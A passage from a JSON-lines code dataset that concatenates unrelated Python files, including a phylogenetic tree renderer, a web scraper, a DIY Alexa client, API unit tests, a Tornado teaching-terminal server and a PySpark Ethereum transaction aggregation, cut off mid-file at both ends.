print_all_features(t)\n#t.render(\"mytree.png\",tree_style=ts)\n print(filepath_newick + \"_replaced\")\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n elif(option == 2):\n# Create an empty TreeStyle\n ts = TreeStyle()\n# Set our custom layout function\n#ts.layout_fn = layout\n#ts.layout_fn = evol_clean_layout\n# Draw a tree\n#ts.mode = \"c\"\n# We will add node names manually\n ts.show_leaf_name = True\n# Show branch 
data\n#ts.scale = 120\n#ts.arc_start = 0 # 0 degrees = 3 o'clock\n#ts.arc_span = 180\n ts.min_leaf_separation = 10\n ts.show_branch_length = False\n ts.show_branch_support = False\n\n t = EvolTree(filepath_newick, format=1)\n print(filepath_newick)\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n\n#t = decode_tree(t)\n#t = replace_inferred(t)\n#t = give_weight(t)\n#t = make_germline_top(t)\n#del_dist(t)\n make_dist_constant(t)\n#alg = make_rand_fasta(t)\n alg_file = open(filepath_alignment, \"r\")\n alg = alg_file.read()\n\n t.link_to_alignment(alg,nucleotides=False)\n#t.workdir = './workspace'\n#t.run_model('SLR', keep=False)\n#t.render(\"mytree.png\", histfaces=['SLR'], w=3000, tree_style=ts)\n t.render(filepath_newick.replace(\".newick\", \".png\"), w=3000, tree_style=ts)\n#t.render(\"mytree.png\",tree_style=ts)\n print(filepath_newick + \"_replaced\")\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n#print(sample_t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n\nif __name__ == '__main__':\n filepath_newick = arguments['<filepath_newick>']\n option = int(arguments['--option'])\n\n if arguments['--dummy']:\n print('dummy on')\n draw_tree(option, filepath_newick, None, True)\n else:\n print('dummy off')\n draw_tree(option, filepath_newick, None, False)\n","sub_path":"PhyloTree/phylo_tree.py","file_name":"phylo_tree.py","file_ext":"py","file_size_in_byte":13650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"379236069","text":"from flask import Flask, render_template\nimport requests\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods = ['GET'])\ndef get_dato():\n options = webdriver.ChromeOptions()\n options.add_argument(\"headless\")\n options.add_argument(\"no-sandbox\")\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n urls = [\"https://webscraper.io/test-sites/e-commerce/scroll/computers/laptops\", \"https://webscraper.io/test-sites/e-commerce/scroll/computers/tablets\", \"https://webscraper.io/test-sites/e-commerce/scroll/phones/touch\"]\n\n for url in urls:\n driver.get(url)\n print('url', url)\n time.sleep(2)\n screen_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n scroll_height = driver.execute_script(\"return document.body.scrollHeight\")\n print('height',scroll_height)\n if scroll_height == screen_height:\n print('break while')\n break\n screen_height = scroll_height\n\n\n allObj = BeautifulSoup(driver.page_source, 'html.parser')\n dataProducts = allObj.findAll(\"div\", {\"class\":\"caption\"})\n if(url==\"https://webscraper.io/test-sites/e-commerce/scroll/computers/laptops\"):\n\n datoL = list()\n for dataProduct in dataProducts:\n datoL.append({\n \"nombre\": dataProduct.find(\"a\", {\"class\":\"title\"}).text,\n \"caracteristicas\": dataProduct.find(\"p\", {\"class\":\"description\"}).text,\n \"valor\":dataProduct.find(\"h4\", {\"class\":\"price\"}).text\n })\n with open('laptops.json', 'w') as file:\n json.dump(datoL, file, indent=4, sort_keys=True)\n\n\n if(url==\"https://webscraper.io/test-sites/e-commerce/scroll/phones/touch\"):\n 
datoP = list()\n for dataProduct in dataProducts:\n datoP.append({\n \"nombre\": dataProduct.find(\"a\", {\"class\":\"title\"}).text,\n \"caracteristicas\": dataProduct.find(\"p\", {\"class\":\"description\"}).text,\n \"valor\":dataProduct.find(\"h4\", {\"class\":\"price\"}).text\n })\n with open('phones.json', 'w') as file:\n json.dump(datoP, file, indent=4, sort_keys=True)\n\n if(url==\"https://webscraper.io/test-sites/e-commerce/scroll/computers/tablets\"):\n\n datoT = list()\n for dataProduct in dataProducts:\n datoT.append({\n \"nombre\": dataProduct.find(\"a\", {\"class\":\"title\"}).text,\n \"caracteristicas\": dataProduct.find(\"p\", {\"class\":\"description\"}).text,\n \"valor\":dataProduct.find(\"h4\", {\"class\":\"price\"}).text\n })\n with open('tablets.json', 'w') as file:\n json.dump(datoT, file, indent=4, sort_keys=True)\n\n\n return render_template('index.html', datoP=datoP, datoL=datoL, datoT=datoT)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"22315213","text":"#! /usr/bin/env python\n\nimport os\nimport random\nimport time\nimport random\nfrom creds import *\nimport requests\nimport json\nimport re\nimport subprocess\nfrom memcache import Client\n\n# Setup\nrecorded = False\nservers = [\"127.0.0.1:11211\"]\nmc = Client(servers, debug=1)\npath = os.path.realpath(__file__).rstrip(os.path.basename(__file__))\n\n\ndef internet_on():\n print(\"Checking Internet Connection\")\n try:\n r = requests.get('https://api.amazon.com/auth/o2/token')\n print(\"Connection OK\")\n return True\n except:\n print(\"Connection Failed\")\n return False\n\n\ndef gettoken():\n token = mc.get(\"access_token\")\n refresh = refresh_token\n if token:\n return token\n elif refresh:\n payload = {\"client_id\": Client_ID, \"client_secret\": Client_Secret,\n \"refresh_token\": refresh, \"grant_type\": \"refresh_token\", }\n url = \"https://api.amazon.com/auth/o2/token\"\n print(\"payload=\")\n print(payload)\n r = requests.post(url, data=payload)\n print(\"res=\")\n print((r.text))\n resp = json.loads(r.text)\n mc.set(\"access_token\", resp['access_token'], 3570)\n return resp['access_token']\n else:\n return False\n\n\ndef alexa():\n url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize'\n headers = {'Authorization': 'Bearer %s' % gettoken()}\n d = { # a dict\n \"messageHeader\": {\n \"deviceContext\": [\n {\n \"name\": \"playbackState\",\n \"namespace\": \"AudioPlayer\",\n \"payload\": {\n \"streamId\": \"\",\n \"offsetInMilliseconds\": \"0\",\n \"playerActivity\": \"IDLE\"\n }\n }\n ]\n },\n \"messageBody\": {\n \"profile\": \"alexa-close-talk\",\n \"locale\": \"en-us\",\n \"format\": \"audio/L16; rate=16000; channels=1\"\n }\n }\n with open(path + 'recording.wav') as inf:\n files = [ # a list\n ('file', ('request', json.dumps(d), 'application/json; charset=UTF-8')),\n ('file', ('audio', inf, 'audio/L16; rate=16000; channels=1'))\n ]\n print(type(files))\n print(type(d))\n r = requests.post(url, headers=headers, files=files)\n if r.status_code == 200:\n for v in r.headers['content-type'].split(\";\"):\n if re.match('.*boundary.*', v):\n boundary = v.split(\"=\")[1]\n data = r.content.split(boundary)\n for d in data:\n if (len(d) >= 1024):\n audio = d.split('\\r\\n\\r\\n')[1].rstrip('--')\n print(type(audio))\n with open(path + \"response.mp3\", 'wb') as f:\n f.write(audio)\n os.system(\n 'mpg123 -q {}1sec.mp3 {}response.mp3'.format(path 
+ \"/assets/\", path))\n else:\n print(\"requests returned r.status_code = %r\" % r.status_code)\n\n\ndef start():\n print(\"Touch MATRIX Creator IR Sensor\")\n process = subprocess.Popen(\n ['./micarray/build/micarray_dump'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n audio, err = process.communicate()\n\n rf = open(path + 'recording.wav', 'w')\n rf.write(audio)\n rf.close()\n alexa()\n\n\nif __name__ == \"__main__\":\n print(\"This is a MATRIX Creator demo - not ready for production\")\n print(\"Running workaround for GPIO 16 (IR-RX) \")\n subprocess.Popen(['sudo', 'rmmod', 'lirc_rpi'])\n\n while internet_on() == False:\n print(\".\")\n token = gettoken()\n os.system('mpg123 -q {}1sec.mp3 {}hello.mp3'.format(path +\n \"/assets/\", path + \"/assets/\"))\n while True:\n subprocess.Popen(['gpio','edge','16','both'])\n start()\n","sub_path":"audio/DIYAmazonAlexa/DIYAmazonAlexa.py","file_name":"DIYAmazonAlexa.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"58424255","text":"from country_bounding_boxes import (\n country_subunits_containing_point,\n country_subunits_by_iso_code\n)\nimport os\nimport json\n\nCOUNTRY_INDEX = 0\nLANG_INDEX = 15\n\n# Recieves a lang string and converts it so it can be used with langs for tweets in our db\ndef convert_lang(lang):\n if(len(lang) == 2):\n return lang\n elif(len(lang) == 3):\n return None\n elif(len(lang) == 5):\n return lang[:2]\n else:\n return None\n\n# Returns bounding boxes for a country.\n# The country MUST be specified in two letter ISO format\ndef get_bounding_boxes_for_country(country_code):\n if len([c for c in country_subunits_by_iso_code(country_code)]) == 0:\n return None\n\n return {\n 'bboxes': [c.bbox for c in country_subunits_by_iso_code(country_code)],\n 'weights': [c.pop_est for c in country_subunits_by_iso_code(country_code)]\n }\n\n# Get all country codes that speak a language\ndef get_country_codes_speaking_lang(tweet_lang):\n\n dir = os.path.dirname(__file__)\n filename = os.path.join(dir, 'map_lang_to_countries.json')\n if(not os.path.isfile(filename)):\n preprocess_lang_file()\n \n res = []\n with open(filename, 'r') as data_file: \n data = json.load(data_file)\n return data.get(tweet_lang)\n\n# The entry point for this layer\ndef get_bboxes_and_weights(tweet_lang):\n countries = get_country_codes_speaking_lang(tweet_lang)\n if(countries != None):\n bboxes = list(map(get_bounding_boxes_for_country, countries))\n bboxes = list(filter(None, bboxes))\n return bboxes\n\n# This can be run to \ndef preprocess_lang_file():\n dir = os.path.dirname(__file__)\n filename = os.path.join(dir, '../data/geonames/countryInfo.txt')\n country_languages = open(filename, 'r', encoding=\"utf-8\")\n\n res = {}\n\n for line in country_languages:\n # Skip comments\n if(line[0] == '#'):\n continue\n \n splitted_line = line.split('\\t')\n\n # Get country\n country = splitted_line[COUNTRY_INDEX]\n\n # Get all langs in a list\n langs = splitted_line[LANG_INDEX].split(',')\n langs = list(map(convert_lang, langs))\n langs = list(filter(None, langs))\n\n for lang in langs:\n if(res.get(lang) == None):\n res[lang] = []\n res[lang].append(country)\n\n file = open('map_lang_to_countries.json', 'w') \n file.write(json.dumps(res, sort_keys=True, indent=4, separators=(',', ': ')))\n file.close() \n print('Saved preprocessed file in 
map_lang_to_countries.json')","sub_path":"layers_method/tweet_lang.py","file_name":"tweet_lang.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"576780862","text":"from unittest import TestCase\r\nfrom public_data.public_data import *\r\nimport unittest\r\nimport requests\r\nimport json\r\n\r\nclass UserInfo(TestCase):\r\n    logger.info('=' * 30 + '[Start running the user info module API test cases]' + '=' * 30)\r\n    def setUp(self):\r\n        self.urlsite = (read_excel('publicData', 1, 1))  # shared base url\r\n        self.all_sheet = 2  # index of the sheet that results are written to\r\n        self.sheetNAME = 'Userinfo'  # name of the sheet that test data is read from\r\n\r\n    def tearDown(self):\r\n        logger.info(self.apiname)\r\n        logger.info(self.parameter)\r\n        logger.info(self.dd)\r\n\r\n    '''Wrap the assertion and result writing into a single method'''\r\n    def requestHandler(self, reqdata, row):\r\n        self.result = requests.post(self.urlsite, data=reqdata,verify=False)  # send the POST request; with verify=False, Requests skips SSL certificate verification\r\n        self.dd = json.loads(self.result.text)  # convert the JSON response into a Python dict so the values are easy to extract\r\n        # assert: compare the actual result value with the expected result from the sheet\r\n        self.assertEqual(int(self.dd['result']), int(read_excel(self.sheetNAME, row, 6)))\r\n        # # write back the result value; 0 means success\r\n        write_excel(self.all_sheet, row, 8, 'result:' + str(self.dd['result']))\r\n\r\n    def test_userinfo1(self,row=1):\r\n        '''Get the user list'''\r\n        self.apiname=read_excel(self.sheetNAME,row,2)\r\n        self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n        self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n    def test_userinfo2(self,row=3):\r\n        '''Create a new user'''\r\n        self.apiname=read_excel(self.sheetNAME,row,2)\r\n        self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n        self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n    # def test_userinfo3(self,row=4):\r\n    #     '''Update a user'''\r\n    #     self.apiname=read_excel(self.sheetNAME,row,2)\r\n    #     self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n    #     print(self.parameter)\r\n    #     self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n    def test_userinfo4(self,row=5):\r\n        '''Update the password'''\r\n        self.apiname=read_excel(self.sheetNAME,row,2)\r\n        self.parameter=Headers(read_excel('publicData',4,1),read_excel('Userinfo',row,5))\r\n        self.requestHandler(reqdata=self.parameter,row=row)\r\n\r\n    def test_userinfo5(self, row=6):\r\n        '''Lock a user'''\r\n        self.apiname = read_excel(self.sheetNAME, row, 2)\r\n        self.parameter = Headers(read_excel('publicData', 4, 1), read_excel('Userinfo', row, 5))\r\n        self.requestHandler(reqdata=self.parameter, row=row)\r\n\r\n    def test_userinfo6(self, row=7):\r\n        '''Unlock a user'''\r\n        self.apiname = read_excel(self.sheetNAME, row, 2)\r\n        self.parameter = Headers(read_excel('publicData', 4, 1), read_excel('Userinfo', row, 5))\r\n        self.requestHandler(reqdata=self.parameter, row=row)\r\n\r\n    def test_userinfo7(self, row=2):\r\n        '''Delete a user'''\r\n        self.apiname = read_excel(self.sheetNAME, row, 2)\r\n        self.parameter = Headers(read_excel('publicData', 4, 1), read_excel('Userinfo', row, 5))\r\n        print(self.parameter)\r\n        self.requestHandler(reqdata=self.parameter, row=row)\r\n\r\nif __name__ == '__main__':\r\n    suite = unittest.TestSuite()\r\n    suite.addTest(UserInfo('test_userinfo1'))\r\n    runner = unittest.TextTestRunner()\r\n    runner.run(suite)\r\n","sub_path":"RasyncadminApi/testcase/test_02_userinfo.py","file_name":"test_02_userinfo.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336621960","text":"from pprint import pprint\n\nclass AbstractDemandStack(object):\n\n    def __init__(self, line_items, adx_feed, options):\n        # self.line_items = sorted(\n        #     line_items,\n        #     key=lambda li: li.current_adx_price_decimal(),\n        #     reverse=True\n        # )\n        self.line_items = line_items\n        self.adx_feed = adx_feed\n        self.target_adx_fill_rate = options['target_adx_fill_rate']\n        self.delta_per_opt = options['delta_per_optimization']\n        if self.delta_per_opt < 0:\n            raise Exception('delta_per_optimization must not be negative: '+str(self.delta_per_opt))\n\n\nclass StaticDemandStack(AbstractDemandStack):\n    def optimize(self):\n        return {\n            'line_item_changes': [],\n        }\n\n\nclass OptimizingDemandStack(AbstractDemandStack):\n    FILL_RATE_MARGIN = 1.0\n\n    def optimize(self):\n        direction = self.fill_rate_direction()\n        adjust_reports = []\n        if direction == 1:\n            idx = 0\n            for line_item in self.line_items:\n                adx_price_previous = self.line_items[idx - 1].adx_price() - 1 if idx > 0 else None\n                report = line_item.increase_price(self.delta_per_opt, adx_price_previous)\n                if report is not None and not self._is_empty_report(report):\n                    adjust_reports.append(report)\n                idx += 1\n        elif direction == -1:\n            idx = 0\n            self.line_items.reverse()\n            for line_item in self.line_items:\n                adx_price_previous = self.line_items[idx - 1].adx_price() + 1 if idx > 0 else None\n                report = line_item.decrease_price(-1 * self.delta_per_opt, adx_price_previous)\n                if report is not None and not self._is_empty_report(report):\n                    adjust_reports.append(report)\n                idx += 1\n            adjust_reports.reverse()\n            self.line_items.reverse()\n        else:\n            # direction is 0, meaning we have arrived at the target fill rate\n            pass\n\n        return {\n            'line_item_changes': adjust_reports,\n        }\n\n    def _is_empty_report(self, report):\n        return report['adx_price_before'] == report['adx_price_after']\n\n    def fill_rate_direction(self):\n        distance_to_target = self.target_adx_fill_rate - self.adx_feed.fill_rate_for(self)\n\n        if abs(distance_to_target) <= self.FILL_RATE_MARGIN:\n            return 0\n\n        if distance_to_target < 0:\n            return 1\n        else:\n            return -1\n","sub_path":"demand_stack.py","file_name":"demand_stack.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"125100529","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\n\n\nform = \"\"\"\n    <form method=\"post\">\n      <label>\n        Month\n        <input type=\"text\" name=\"month\" value=\"%(month)s\">\n      </label>\n      <label>\n        Day\n        <input type=\"text\" name=\"day\" value=\"%(day)s\">\n      </label>\n      <label>\n        Year\n        <input type=\"text\" name=\"year\" value=\"%(year)s\">\n      </label>\n      <div style=\"color:red;\">%(error)s</div>\n      <br>\n      <br>\n      <input type=\"submit\">\n    </form>\n    \"\"\"\n\ntexta = \"\"\"\n    <form method=\"post\">\n    <h1>Enter some text to ROT13:</h1>\n    <textarea style=\"height: 100px; width: 400px;\">\n    </textarea>\n    <br>\n\n    <input type=\"submit\">\n    </form>\n    \"\"\"\nclass MainHandler(webapp2.RequestHandler):\n\n    months=['January',\n            'February',\n            'March',\n            'April',\n            'May',\n            'June',\n            'July',\n            'August',\n            'September',\n            'October',\n            'November',\n            'December'\n            ]\n\n    # error method\n    def errorForm(self, error=\"\", month=\"\", day=\"\", year=\"\"):\n        self.response.out.write(form % {\"error\": error, \"month\":month, \"day\":day, \"year\":year})\n\n    # validate month\n    def valid_month(self, month):\n        if month:\n            cap_month = month.capitalize()\n            if cap_month in self.months:\n                return cap_month\n\n    # validate day\n    def valid_day(self, day):\n        if day and day.isdigit():\n            day = int(day)\n            if day > 0 and day <= 31:\n                return day\n\n    # validate year\n    def validate_year(self, year):\n        if year and year.isdigit():\n            year = int(year)\n            if year > 1900 and year <= 2020:\n                return year\n\n    def get(self):\n        self.errorForm()\n\n    def post(self):\n\n        # get what users enter\n        user_month = self.request.get('month')\n        user_day = self.request.get('day')\n        user_year = self.request.get('year')\n\n        # validate the inputs\n        month = self.valid_month(user_month)\n        day = self.valid_day(user_day)\n        year = self.validate_year(user_year)\n\n        if not (month and day and year):\n            self.errorForm('Invalid data, please try again', user_month, user_day, user_year)\n        else:\n            self.redirect('/thanks')\n\n\n# class handler\nclass ThanksHandler(webapp2.RequestHandler):\n    def get(self):\n        self.response.out.write('Thanks for your data!')\n\n# class for rot13\nclass Rot13(webapp2.RequestHandler):\n\n    def write_form(self, error=\"\"):\n        self.response.out.write(texta)\n\n    def get(self):\n        self.write_form()\n\napp = webapp2.WSGIApplication([\n    ('/', MainHandler), ('/thanks', ThanksHandler), ('/rot13', Rot13)\n], debug=True)\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"412653710","text":"import torch\nimport nibabel as nib\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\nfrom src.data.datasets import BaseDataset\nfrom src.data.transforms import Compose, ToTensor\n\n\nclass LitsAdaptDataset(BaseDataset):\n    \"\"\"The dataset of the Liver Tumor Segmentation Challenge (LiTS) in MICCAI 2017\n    for self-supervised learning.\n\n    Ref:\n        https://competitions.codalab.org/competitions/17094\n        https://github.com/PatrickChrist/LITS-CHALLENGE/blob/master/submission-guide.md\n\n    Args:\n        data_split_file_path (str): The data split file path.\n        preprocess (BoxList): The preprocessing techniques applied to the data.\n        transforms (BoxList): The self-supervised transforms applied to the data.\n    \"\"\"\n\n    def __init__(self, data_split_file_path, preprocess, transforms, **kwargs):\n        super().__init__(**kwargs)\n        if self.type == 'train':\n            data_split_file = pd.read_csv(data_split_file_path)\n            patient_dirs = map(\n                Path,\n                data_split_file[\n                    (data_split_file.type == 'train') | (data_split_file.type == 'valid')\n                ].path\n            )\n            self.data_paths = tuple(\n                data_path\n                for patient_dir in patient_dirs\n                for data_path in sorted(patient_dir.glob('**/*volume-*.nii'))\n            )\n        elif self.type == 'valid':\n            self.data_paths = tuple(['nan'])\n\n        self.preprocess = Compose.compose(preprocess)\n        self.transforms = Compose.compose(transforms)\n        self.to_tensor = ToTensor()\n\n    def __getitem__(self, index):\n        ct_path = self.data_paths[index]\n        nii_img = nib.load(ct_path.as_posix())\n        ct = nii_img.get_fdata().astype(np.float32)[..., np.newaxis]\n        input_spacing = nii_img.header['pixdim'][1:4]\n        transforms_kwargs = {\n            'Resample': 
{\n 'input_spacings': (input_spacing,),\n 'orders': (1,)\n }\n }\n ct, = self.preprocess(ct, **transforms_kwargs)\n transformed_ct, = self.transforms(ct)\n transformed_ct, ct = self.to_tensor(transformed_ct, ct, dtypes=[torch.float, torch.float])\n metadata = {'input': transformed_ct, 'target': ct}\n return metadata\n\n def __len__(self):\n return len(self.data_paths)\n","sub_path":"src/data/datasets/lits_adapt_dataset.py","file_name":"lits_adapt_dataset.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"604907649","text":"\"\"\"A single common terminal for all websockets.\n\"\"\"\nimport tornado.web\n# This demo requires tornado_xstatic and XStatic-term.js\nimport tornado_xstatic\n\nimport os.path\nimport webbrowser\nimport tornado.httpserver\nimport tornado.ioloop\nimport terminado\nfrom terminado import TermSocket, UniqueTermManager, uimodule\nimport tempfile\n\n# {week: max steps}\nCLASS00_STEP_DICT = {0: 2}\nCLASS01_STEP_DICT = {0: 6}\nCLASS02_STEP_DICT = {0: 6, 1: 13, 2: 9, 3: 10, 4: 9, 5: 7, 6: 5, 7: 5, 8: 7, 9: 2, 10: 4}\n# 03: Ms. Thomas' and Mr. Lamb's Classes\nCLASS03_STEP_DICT = {0: 6, 1: 8, 2: 8, 3: 5, 4: 5, 5: 4, 6: 7, 7: 6, 8: 6}\nCLASS04_STEP_DICT = {0: 11, 1: 11}\n# 05: Basic Python\nCLASS05_STEP_DICT = {0: 6, 1: 6, 2: 6, 3: 4, 4: 4, 5: 5, 6: 5, 7: 5}\n# 06: Intermediate Python\nCLASS06_STEP_DICT = {0: 6, 1: 5, 2: 7, 3: 5, 4: 6, 5: 6, 6: 6, 7: 5, 8: 5, 9: 4, 10: 6}\n# 07: Introduction to Programming (Web)\nCLASS07_STEP_DICT = {0: 6, 1: 8, 2: 8, 3: 5, 4: 5, 5: 4}\n# 08: Introduction to Programming (Raspberry Pi)\nCLASS08_STEP_DICT = {0: 6, 1: 6, 2: 9, 3: 5, 4: 5, 5: 4}\nCLASS10_STEP_DICT = {0: 6, 1: 5, 2: 8, 3: 5}\n# 14: Common Core Math\nCLASS14_STEP_DICT = {0: 6, 1: 5, 2: 7, 3: 5}\n\nCLASS_DICT = {'00': CLASS00_STEP_DICT, '01': CLASS01_STEP_DICT, '02': CLASS02_STEP_DICT, '03': CLASS03_STEP_DICT,\n '04': CLASS04_STEP_DICT, '05': CLASS05_STEP_DICT, '06': CLASS06_STEP_DICT, '07': CLASS07_STEP_DICT,\n '08': CLASS08_STEP_DICT, '10': CLASS10_STEP_DICT, '14': CLASS14_STEP_DICT}\n\nNO_SKULPT = False\n\nFILE_PATH = \"\"\n\n\nclass ClassDir(tornado.web.RequestHandler):\n def get(self, dir):\n directory = dir + '.html'\n return self.render('directory/' + directory)\n\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n def open(self):\n # self.ping('one')\n print('new connection')\n\n def on_pong(self, data):\n print('got pong', data)\n\n def on_message(self, message):\n print('=====Code Being Run: Start=====')\n print(message)\n print('=====Code Being Run: End=====')\n\n # code = message\n\n tf = tempfile.NamedTemporaryFile(delete=False)\n tfName = tf.name\n tf.seek(0)\n # tf.write(code)\n tf.write(message.encode(\"utf-8\"))\n tf.flush()\n # print('The temporary python file is ' + tfName)\n\n # print 'message received:\\n%s' % message\n self.write_message(tfName)\n\n def on_close(self):\n print('connection closed')\n\n def check_origin(self, origin):\n return True\n\n\nclass ClassWeek(tornado.web.RequestHandler):\n def get(self, class_url, week_url, step_url): #(self, class_url, week_url, step_url):\n class_number = class_url.replace('class', '')\n week_number = int(week_url.replace('week', ''))\n step_number = step_url.replace('step', '')\n # print(class_url, week_url, step_url, class_dict)\n max_steps = range(CLASS_DICT[class_number][week_number])\n path_to_step = 'classes/' + class_url + '/' + week_url + '/' + step_url + '/main.html'\n return self.render(path_to_step, 
current_class=class_url, current_week=week_url,\n current_step=step_number, total_steps=max_steps, step_path=path_to_step,\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\")\n\nclass ClassLesson(tornado.web.RequestHandler):\n def get(self, class_url, lesson_url, step_url): #(self, class_url, week_url, step_url):\n class_number = class_url.replace('class', '')\n lesson_number = int(lesson_url.replace('lesson', ''))\n step_number = step_url.replace('step', '')\n # print(class_url, lesson_url, step_url)\n max_steps = range(CLASS_DICT[class_number][lesson_number])\n path_to_step = 'classes/' + class_url + '/' + lesson_url + '/' + step_url + '/main.html'\n return self.render(path_to_step, current_class=class_url, current_week=lesson_url,\n current_step=step_number, total_steps=max_steps, step_path=path_to_step,\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\")\n\nclass TerminalHandler(tornado.web.RequestHandler):\n def get(self):\n return self.render(\"index.html\",\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\"\n )\n\n\nclass TestHandler(tornado.web.RequestHandler):\n def get(self):\n return self.render(\"pybly.html\",\n static=self.static_url,\n xstatic=self.application.settings['xstatic_url'],\n ws_url_path=\"/websocket\"\n )\n\n\ndef main(argv):\n\n term_manager = UniqueTermManager(shell_command=['bash'])\n\n handlers = [\n (r\"/websocket\", TermSocket,\n {'term_manager': term_manager, 'keep_alive_time': 30}), # AJL: added the keep_alive after noticed dropped ws in class after 55s Heroku limit.\n (r\"/\", TerminalHandler),\n (r\"/xstatic/(.*)\", tornado_xstatic.XStaticFileHandler,\n {'allowed_modules': ['termjs']}),\n (r\"/(dir[0-9][0-9])\", ClassDir),\n (r\"/(class[0-9][0-9])/(week[0-9][0-9])/([0-9][0-9])\", ClassWeek),\n (r\"/(class[0-9][0-9])/(lesson[0-9][0-9])/([0-9][0-9])\", ClassLesson),\n # (r\"/test\", TestHandler),\n (r\"/ws\", WSHandler),\n ]\n\n app = tornado.web.Application(handlers,\n # static_path=os.path.join(os.path.dirname(terminado.__file__), \"static/js\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n # static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n ui_modules={'Terminal': uimodule.Terminal},\n xstatic_url=tornado_xstatic.url_maker('/xstatic/', True)\n )\n\n http_server = tornado.httpserver.HTTPServer(app)\n port = int(os.environ.get(\"PORT\", 8765))\n http_server.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == '__main__':\n main([])","sub_path":"pybly.py","file_name":"pybly.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"532024765","text":"from connection import connect\nfrom create_query_sql import creation_query_list\n\ndef create_db(query_list = None):\n if query_list is None:\n query_list = creation_query_list\n\n conn = connect()\n cursor = conn.cursor()\n for query in query_list:\n try:\n cursor.execute(query)\n except:\n print(f\"nie udało się wykonać zapytania {query}\")\n conn.close()\n\nif __name__ == \"__main__\":\n create_db()\n\n","sub_path":"PycharmProjects/pythonProject3/creation_db.py","file_name":"creation_db.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} 
+{"seq_id":"527117194","text":"import pyspark\n\nsc = pyspark.SparkContext()\n\ndef clean_trans(trans):\n try:\n fields = trans.split(',')\n if len(fields)!=7:\n return False\n int(fields[3])\n return True\n except:\n return False\n\n\ndef clean_contracts(contract):\n try:\n fields = contract.split(',')\n if len(fields)!=5:\n return False\n return True\n except:\n return False\n\ntrans = sc.textFile(\"/data/ethereum/transactions\")\ntrans_f = trans.filter(clean_trans)\naddress=trans_f.map(lambda l: (l.split(',')[2], int(l.split(',')[3]))).persist()\npartbjob1output = address.reduceByKey(lambda a,b:(a+b))\npartbjob1output_join=partbjob1output.map(lambda f:(f[0], f[1]))\n\ncontracts = sc.textFile(\"/data/ethereum/contracts\")\ncontracts_f = contracts.filter(clean_contracts)\ncontracts_join = contracts_f.map(lambda f: (f.split(',')[0],f.split(',')[3]))\n\npartbjob2output = partbjob1output_join.join(contracts_join)\n\ntop10=partbjob2output.takeOrdered(10, key = lambda x:-x[1][0])\nfor record in top10:\n print(\"{}: {}\".format(record[0],record[1][0]))\n","sub_path":"PartD/ComparitiveEval/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"220592827","text":"'''\nAbstract class for the annotator models.\n'''\nimport numpy as np\nfrom scipy.special import gammaln\n\nclass Annotator():\n\n def update_post_alpha(self, 